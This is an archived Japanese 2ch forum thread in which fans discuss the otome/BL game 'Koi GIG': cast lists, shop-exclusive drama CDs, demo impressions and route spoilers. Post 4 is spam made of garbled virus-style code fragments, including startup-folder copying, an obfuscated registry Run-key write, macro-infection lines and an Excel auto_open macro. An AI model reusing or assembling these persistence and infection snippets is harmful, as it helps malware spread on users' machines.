1read 100read
2013年06月女向ゲー一般312: 乙女@恋ギグ〜乙女ゲーなのにBL〜 2nd GIG (301) TOP カテ一覧 スレ一覧 2ch元 削除依頼
乙女@PANDORA 攻略ネタバレスレ (397)
疲れた。乙女ゲームをやめるためのスレ (150)
エロいキャラソンを挙げてみるスレ (419)
乙女@花梨エンターテイメント (694)
乙女@DIABOLIK LOVERSスレ part14 (224)
サモンナイトシリーズ総合 第十五話 (609)

乙女@恋ギグ〜乙女ゲーなのにBL〜 2nd GIG


1 :2007/09/13 〜 最終レス :2013/04/28
携帯版とPC版「恋ギグ〜乙女ゲーなのにBL〜」について語るスレです。
※主人公は女性ですが、BL要素が含まれる可能性があるので要注意!
キャストなど他情報については>>2-10参照。次スレは>>980を踏んだ方よろしく。
●公式サイト(PC)
ttp://www.twofive.co.jp/koigig/index.html
●前スレ
http://game12.2ch.net/test/read.cgi/ggirl/1153412243/
●製品概要
ジャンル インタラクティブノベル
発売日  2007年11月2日
価格   7140円(税込)
メディア DVD-ROM対応
OS    Windows 2000/XP/Vista
音声   フルボイス(主人公を除く)
対象年齢 全年齢
システム 主人公の名前変更機能(予定)
●ショップ特典
TWOFIVE通販   オリジナルミニドラマCD+描き下ろしポストカードセット
メッセサンオー メッセサンオーオリジナルミニドラマCD
トイズwalker  トイズwalkerオリジナルミニドラマCD
アニメイト   アニメイトオリジナルミニドラマCD

2 :
●キャスト
シュウ 橘 正秀   パートVo. 小野 大輔
トラ  桂 虎太郎  パートBa. 菅沼 久義
ラン  青柳 走司  パートGt. 羽多野 渉
ミック 御木本 千鶴 パートDr. 遠近 孝一
岸部親文  大橋 隆昌
ザビエル  鳥海 浩輔
タケシ   松原 大典
青柳功一  川田 紳司
御木本丈一 大川 透
●関連グッズ
・ドラマCD 恋ギグ― Let It Bleed ― (※主人公ボイス有)
・KoiGIG〜DEVIL×ANGEL〜フリーダムジュライパンフレット

3 :
>>1 乙です!
携帯のwiki
ttp://www16.atwiki.jp/koigig/

4 :
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub

5 :
●ショップ特典追加
ゲーマーズ ドラマCD
ttp://shop.broccoli.co.jp/item_detail.php?product_id=7186

6 :
>>1 乙です
前スレ落ちたか…発売までは今のペースのままかな

7 :
ここは即死あるんだっけ?
>6
もうちょっと情報でないと盛り上がんないだろうね…
攻略キャラ追加とかないかな

8 :
今日全員クリアしてみた。
たまたますごい展開の二人を後に残してたので、
とにかくびっくりしている。
ギャグで始まったゲームだから、
とにかくあっけにとられたよ。

9 :
携帯の方はしゅうしかクリアしてないや
ランは姐さん方の感想聞いて、恐ろしくてできなかったな…
PCは女性ライターもいるようだし、そこら辺は変わってるといいね
>>7
もしも追加されるとしたら…
本命→ザビエル
対抗→岸部
大穴→元カレ
と予想。なんとなくだが

10 :
落ちててびびった…
ザビエルはないなぁ…
ファンタジーと割り切ってもあの髪型はねーよ…
加えてフォモ
どうしようもないw
でも彼女がいたんだよね
びっくりだわ

11 :
彼女いたのかw
携帯はやったことないからどんな話なのか楽しみだわ

12 :
ザビエルは両刀

13 :
えっ、そんなキャラなの!!?

14 :
ビズログ読んだ
元カレとの復縁ルートありそうな予感?
>>13
ザビエルはそんなキャラだよ
変態な鳥海を楽しみたい方はぜひ

15 :
ザビエルは両刀だったけど完全なゲイになったんだそ?
だって主人公をフルボッコにした際に「女じゃ起たねえ」とかなんとか言ってたじゃん
見間違い?

16 :
ザビエルという名前だけで噴いてしまう

17 :
フランシスコ

18 :
某ゲームのキャラデザやってる時から好きだけど
動きのある絵を描けるし筋肉もかこいいのに
崩れる時はほんと酷い崩れ方するな、絵師さん
OPムービーも序盤のシュウとかかっこよかったのに
キスシーンですさまじく萎えたw
苦手なのかキスシーン

19 :
ザビエルという珍名だろうが人殺しだろうが天使でも悪魔でもいいし女にハメられようが裸眼鏡だろうが大丈夫だから頼むから攻略キャラが主人公を男だと思ったままアプローチするのはやめてくれまいかorz
BLゲをプレイする自分だが乙女ゲは乙女ゲとして区別してプレイ死体
一体このメーカーはどこの層を狙ってる訳?
BLゲ好きな乙女ゲユーザーしか思いつかんけど自分は上記の理由で嫌だ

20 :
>>19
取りあえず、sageって目欄に入れような
あと、適度に改行してくれると非常に助かる
携帯やってないと思ってレスするから、違ったらゴメン
心配してるヒロインに対するBL的要素あるのはトラだけ

21 :
タイトルにまでBLって入れてるんだから
そういう展開は予想できたんじゃ…
しかし電波・殺人・レイープ(男でも女でも)は勘弁orz

22 :
ああ未プレイなのか。
なんかズレたこと言ってスマン

23 :
たしか「乙女ゲーでBL!?」だっけ?
私は
ヒロインが男装の為、スチルが男×男に見える→乙女ゲーでBL!?
だと思ってたよ
実際携帯でやってみたらガチホモが出て来てびっくりした

24 :
>>23
うん、まぁかなりどうでもいい事なんだけど
スレタイ10回くらい読み直してみれば良いと思うよ。

25 :
サビエルという名前よりも
ザビエルのバンドのナツメヤシのほうが噴いてしまう…

26 :
>>21
え、強姦あるの…?

27 :
>>26
未遂?はあったと思う。つか、もろにあったら18禁w
全年齢対象だけど、個人的には15歳禁くらいの心持ちだ
携帯版のとんでもシナリオをどうするのか気になる
女性ライターもいるようだし、ある程度は直ってるといいが

28 :
ザビエルは未遂
功一は…⊂ミ⊃^ω^)アウアウ

29 :
http://www.youtube.com/watch?v=WLpVgr77vWE

30 :
>>25
あのネーミングセンスには吹き出すよなwww
ザビエルの本名が気になるわw

31 :
いつ見てもナツモヤシに見えてしまう

32 :
>あのネーミングセンス
ってたしか、丼氏がケツメイシをインスパイヤとかじゃなかったかと
ザビエルの本名は自分も気になるw
山田権兵衛みたいなんだったらテラワロス

33 :
レイープあたじゃん。
蘭ちゃんのおにいたんにやられたよ

34 :
携帯版では自分史上最高のクソゲだったから、PC版ではどんな感じになってるか
とても楽しみです。買わないけど。

35 :
ラジオがいつになく、ちゃんとゲームの話してるw

36 :
>>34
そんなにクソゲーだったのか・・・
買うつもりだったんだが、迷う・・・
クソゲーなんかじゃなかった!!、という人はいるかい?

37 :
途中まではそこそこ面白いと思ったけど
終盤の超展開でこれは糞ゲーだと思ったw

38 :
何も知らずにまずランルートにいって、なんかわからん展開になって、鬱になった。
何かの間違いだと思って次はトラルートにいって、なんかわからん展開になって、凶悪な電波を感じた。
以来、もうやってない。
PCソフトで出るとしても内容変わらず、かな。
OPムービみたけど、おんなじに見える。
そして当時を思い出して気分が下がった。

39 :
裸メガネを最初にプレイしてみれば多少は良かったのかもね
ところでランルートはあそこまで鬱展開にする必要があったのだろうか
レイポも殺人も未遂でいいじゃない(`・ω・´)
トラルートは終盤の電波ゆんゆんぶりにそっと携帯を閉じた
シュウルートのシュウと、トラルートのシュウの違いぶりにも違和感だったよ

40 :
ほんとに全年齢対象?
話し聞いてると、とてもそうは思えないんですけどwww

41 :
そういや裸メガネしか落としてなかったことを思い出した>携帯
MacだからPC版買う予定無いし、取りあえず他の奴を落とすべきか?

42 :
>>41
ぜひ他をおとしてみてください
そして感想を・・・

43 :
>>41
全員おとすなら早めにトラルールをお勧めする
他のルールがだいたい許せるようになるぶっとび具合い…

44 :
>>42-43
取りあえずランやってきた
え〜と……出来の悪い昼メロ……?
て言うか、これ確実にPC版だとストーリー変更じゃない?
ゴメン、ショック受けるとか全然なくて、
あまりにもな展開に最後らヘンニマニマしながら読んでたw
何年前の大映ドラマだコラwwww
と言うわけで早速トラに行ってみるお

45 :
初プレイがバッドEDで
その後やり直すのが億劫で終了した<携帯恋ギグ
どうも携帯ゲーム読むのが苦手みたいだ自分
なのでPC版を一応購入予定
恋ギグネトラジでトラの歌流れてたな
何か可愛い

46 :
急ぎ足でトラクリア
凄いなこれwwwwwwwww
残ったしゅうはさてどうするか……

47 :
携帯版ってやっぱり定額制じゃないときつい?
イベントごとに通信じゃないければやってみたいんだけど

48 :
携帯でゲームやりたいなら大人しく定額入っといたほうがいい
いろんなサービスあるだろうけど
請求書に使用したパケット量と代金かいてあるけど
ゲームやった月は8万とかになってるから

49 :
ありがとう!
まだ定額には出来ないから携帯は諦めてPC版買うよ

50 :
オレンジハニーをおわらせたので
恋GIGにチャレンジしてきました。
というわけで感想。
今日裸メガネED見てきました。最終話の最後の最後がよくわかんなかった。
あとおまけも。
でもそんなイヤな展開ではなかったのでPC判もありかなとおもう。
ただ結構過激な展開だから素直に(?)R指定とかつけたほうがしばりがなくなっていいんじゃないかと。
あと、自分の携帯では画像がエラーで表示できないから(重過ぎる??)
みんなの顔がわからんので絵つきでやってみたい。
SB携帯だと絵がでないんですかねOTZ
では昼メロとうわさのランさんねらってきますノシ

51 :
↑のものだけどEDスレに書いたほうがよかったですね
スレ違いスマソ

52 :
ゲーマーズの店舗で予約受け付けてる?
予約用紙がなかったんだけど…

53 :
某ゲー雑誌に収録されていた体験版って、配布していた物と同じなんかな?
本編は歓迎会までで、その後、特典映像みたいなのが、ちょこっとついてた(メインキャラ4人の進行で)。

54 :
予想では10本くらい売れるんじゃないかなって思ってる。

55 :
おいおい10本ってw
せめて20本にしておこうぜww

56 :
体験版キタ━━━━(゚∀゚)━━━━!!
YO-JIN-BOネタがあったww
立ち絵がないシステムは何か楽しいw
終盤のシナリオが心配だけど、買ってしまいそうだ
それにしても序盤からシナリオ追加しすぎwww

57 :
連レススマソ
>>53
WEB配布版は内容一緒だよ
たぶん、行脚配布してる体験版も一緒だと思う

58 :
>56体験版!?追加シナリオ!?
いいなああああ!!!
ここんとこ仕事で家帰れてぬぇからPCサイトチェック出来てないや(´・ω・`)
姐さんよかったら感想を聞かせてくれまいか
明日への活力にするでよ

59 :
>>58
追加というか、ほとんど書き換えてるというか…
主人公がバンドに入る経緯とか、彼氏と別れるシーンの追加
携帯ではシュウ視点で始まったけど、完全主人公視点
前代未聞の主人公の酔い潰れゲ○シーンもない
代わりに、隣の部屋の人に騒いで叱られますw
たぶん携帯より前の時間軸から始まってる
で、主人公の歓迎会の途中で終了…
そのあと、4人が進行で本編の一部シーンを抜粋して流す
選択肢を誤ると岸部さんと主人公による反省会があるw
立ち絵がない代わりに、5〜6人が一気に画面上に顔を出して
ヒソヒソ話とかすると近くによったり、逆に徐々に遠ざかって行ったり…
面白い演出だって思ったよ。バグ出たらやっかいだろうけどw
グダグダで長文になってしまったが、自分の感想はこんな感じだ
家に帰れたら、ぜひ!

60 :
>59おはよう
活力溢れるレポを有り難う(`・ω・´)
明日への力が湧いてきた!
今日は何が何でも帰るわ
シナリオの変更に期待がもてそうだね
この勢いで是非とも昼メロ人外ファンタジーも削りとっちゃって欲しいんだけど、どうかな…
そこまではやっぱ無理かな
でも下呂が削られたなら確実にレイープは削られるよね
楽しみだ!

61 :
休みをもぎ取って体験版プレイ!
と思ったんだけど、人いないのかな…
発売間近(?)の筈なんだけどこの廃れっぷりは一体…
とりあえず感想・体験版バレ一応改行


シナリオが出る場所に常に出ている『click>>>』が気になった
>>>が点滅してるから余計に
主人公のドキュぶりは変わってなかった
むしろタケスィを1時間待たせたあげく誕生日をスルーして、更に今までの行いも笑って許して貰えると思ってて、家に帰ったら帰ったで『私のどこが悪いのよ!』と開きなおって夜中に叫んでキレてるあたりに主人公のドキュがハイパードキュになったなwと思った
隣人wを自己中呼ばわりする場面でも同様
お前が言うな!とww
あとは攻略キャラの立ち絵(と言っていいのか…)が粗いのがなー
描き直して線を綺麗・統一化してくれ…と思うのは贅沢すぎかな
背後はあれ実写写真を加工して絵風?にしてるんだよね
他の恋愛シミュレーションゲームもあんな感じなのかな?
凄い汚いと思うんだけど(´・ω・`)
虎のホモ臭はなくなってたね、と思わせておいてやっぱり後からどっと匂うのかな
気になる

62 :
主人公がドキュだと思っていたのは自分だけじゃなくて良かったw
体験版やって私は絶対感情移入できないと思った。
立ち絵みたいなやつは本当にレベルを統一化して欲しい。
細かいけど凄い気になる。
背景の実写加工は商業では初めてみたよ。
同人だとよくあるけど。

63 :
写真を加工するならするでいいんだけどさ、モロに“人間”が映ってると凄い違和感を感じるんだけど、私だけかな
二次人間とリアル人間は同じ一枚絵に入るべきじゃないと言うか…
細かいこと気にし過ぎ?
立ち絵、寧ろパネルwは本当に描き直して欲しい
マネージャー(非攻略キャラ)のが線が細くて綺麗ってどうよ
主人公は携帯用の方が好きだなー
同じ「悪魔天使に入れあげすぎて彼氏に愛想尽かされる」っていう設定でも、PCはドキュぶりが詳しく書かれただけにマイナス印象が増えた

64 :
音声切り替えが4人、ザビエル、その他ってことは
ザビエル攻略できるんだろうか?

65 :
ザビエルは勘弁して下さい
せめてマネージャーにして下さい

66 :
ここまできたらなんだかザビエルも攻略してみたいような気がしてきたw

67 :
ザビエルはモーホーだから無理だとオモウヨ(´・ω・`)

68 :
ザビエルは両刀ってループだな。
とりあえず、特典ポスカは4人だけみたいだけど

69 :
ポスカさ、これでもかって裸体晒さなくても…
ライブ後設定みたいだから仕方ないかもしれないが
自分は着衣の方が萌えるんでシャツの一枚でも羽織ってほしかったぜ

70 :
用心棒なんか無意味に裸祭りだったじゃないか…
今回は画像あがってるから
「封筒開けたらドキッ!裸だらけのポストカード」なんてドッキリはなしか
そこだけでも良しだな…

71 :
体験版落としてきた
見てて落ち着かない気がするから
ウィンドウより立ち絵がいいな
そしてFurareteブルースがかかって
不覚にも麦茶吹いたwww

72 :
予約特典ポスカの絵柄ってどこかで公開されてる?

73 :
届け隊のブログにあるよ。
買うならポスカもあるから公式でと思ってたけど
絵見れたから、公式でなくてもよくなってきた。
特攻予定の人はもうどこで買うか決めた?

74 :
すでに滅背に特攻済み
あとは公式含む3通りで悩みまくり
出来れば一つにしぼりたい
あみだでもするか・・・

75 :
ドラマCDは全部聴いてみたいけど
Yo-Jin-Boのは短かったからな…
個人的には笑えたんだけどな

76 :
>>73
見られたよ、thx
用心棒みたくチクービ祭りじゃなくてよかったw

77 :
恋ギグは尼じゃ売らないんかな
CDしか検索できない…
あと公式で店舗特典情報のせてくれたのはいいけど
CDの内容も書いといて欲しかったかも

78 :
特典ザッとまとめてみた
兄と25のCD内容がわからんかった
・ツーファイブ特典 オリジナルドラマCD&ポストカード
・メッセオリジナル特典「ハードロックビュッフェ」
「岸部が迷い込んだところはデビルエンジェルが経営するハードロックビュッフェだった…。」
・ゲーマーズオリジナル特典「ロッケンロールハイスクールララバイ」
・トイズ特典「学園野球はロッケンロール」
ある夏の甲子園…マウンドに立っているのはシュウ。振りかぶって投げた球は…
・アニメイト特典CD

79 :
イベントCG公開中!!
マスターアップから発売までって、約一ヶ月もかかるんだね
(というか、マスターアップがどういうものか良く分かっていない人間がここにいますww)

80 :
マスターアップおめ!
延期した時はシステムの不具合でもでたのかと心配したけど
これで発売日まで安心できるな
>>79
一ヶ月もいらない
簡単に言うと原本が完了したみたいな感じだから
あとはそれをもとにCD焼くだけなので

81 :
>>77
確か、
公式:ライダー物みたいなの
滅背:のだめみたいなの
トイズ:おお振りみたいなの だったと思う
ゲマと兄は後から追加されたからわからない

82 :
特典ページ更新されたが、あらすじは書いてないや
公式と滅背にDVD特典追加

83 :
ttp://www.messe.gr.jp/boys/gazou00/p_image/3691p1.jpg
結局トップ絵がパケ絵なのかBLっぽくてイヤン

84 :
>>83
これだとどれがデフォキャラなのかわからないw

85 :
主人公男装バージョンか…と思ったら映ってすらいねえw
どうみてもBLです本当に(ry

86 :
フツーはノリを攻略キャラが囲んだりするんじゃないのか?
えーっと、シュウ総受けゲーですかw
カウントダウンも始まったね

87 :
確かに勘違いはありそうな気もしないではないけど
シンプルでカコイイんで好きだ<パケ

88 :
25トップページの4人が揃ってるのがパケかと思ってた
そういやCDのジャケもシュウとラン(と主人公)なんだな…この二人、お気に入りなのか?

89 :
絵的に二人並べるなら
ボーカル(シュウ)とキーボ(ノリ)よりは
ボーカル&ギターの方が絵になるからな

90 :
恋ギグの主人公ってあんまり中の人に愛されてないよねw

91 :
愛され云々は知らないけど、中の人だけで盛り上がってる感は感じてるw

92 :
中の人の性格込みでつくられてるのが
25の乙女ゲー
なんだかんだでラジオ聴くのが好きだ

93 :
カウントダウンの父メガネいいな〜
攻略したいよw

94 :
うーん…
体験版やるかぎり、自分は中古待ちかな
パケ絵で萎えたorz
どこのホモ毛だよ
あとは↑カキコで指摘されてる立ち絵の書き直しetcがあったら新品で買ってやってもいいw

95 :
ランのシナリオ、直してくれてたら嬉しいな(´・ω・`)
あれはPC全年齢でもおkなレベル?
PSなら無理だろうけど

96 :
>>93
(・∀・)人(・∀・)
攻略キャラじゃないし、ってネタをやられると
逆に攻略できるんじゃないかって期待してしまう。

97 :
今頃携帯恋ギグのシュウEDクリア
…やっぱ携帯でゲームはしんどいわ
おとなしくPC版やっとく
ところで、√に入ったらEDは一つだけ?

98 :
自己解決
BadとGoodがあるのね

99 :
ここ見てると結構買う人多いみたいだね。
余裕で10はクリアしそうだ

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
乙女@QuinRose(クインロゼ)総合30 (198)
乙女@2次元作品で気に入ったシーン【ネタバレ注意】 (105)
乙女@うたの☆プリンスさまっ♪137曲目 (111)
人気があるけどつまらないゲームその4 (114)
乙女@バイオハザード6 (139)
女向ゲームに出てくる食べ物について語るスレ (132)
--log9.info------------------
コミケ初参戦なんですけど、助けてください (113)
企業ブースに殺到するやつってなんなの? (172)
コミケにありがちな誤解 (196)
腐女子はロリコンより危険だということがわかったな (155)
コミケ行く奴って何が楽しいの? (197)
夏コミいこうかと・・・ (105)
同人イベントでの節約を考える (148)
身体障害手帳持ちでコミケ参加してる人いますか? (115)
【計画】女装系同人イベント総合☆13【男の娘】 (179)
同人誌が嫌いな人が集うスレ (142)
東方同人誌でイラっとすること (149)
みみけっと 4耳目 (707)
■山田一雄 漫画家・アニメ制作者に意見する■ (117)
コミケの申し込み忘れたΣ(;゚д゚)ノ□ノ 4回目 (505)
広島県のイベント事情その4 (117)
コミケの理念とはいったい何だったのか? (112)
--log55.com------------------
信長の野望・創造 戦国立志伝 Part100
AWW 「千年帝国の興亡」 PzKw Z
信長の野望・創造 戦国立志伝 Part100
信長の野望・創造 戦国立志伝 Part44
信長の野望・創造 戦国立志伝 Part99
真・三國無双5 Empires part51
【三国志13】三國志13 Part97
三國志13 Part89 三国志13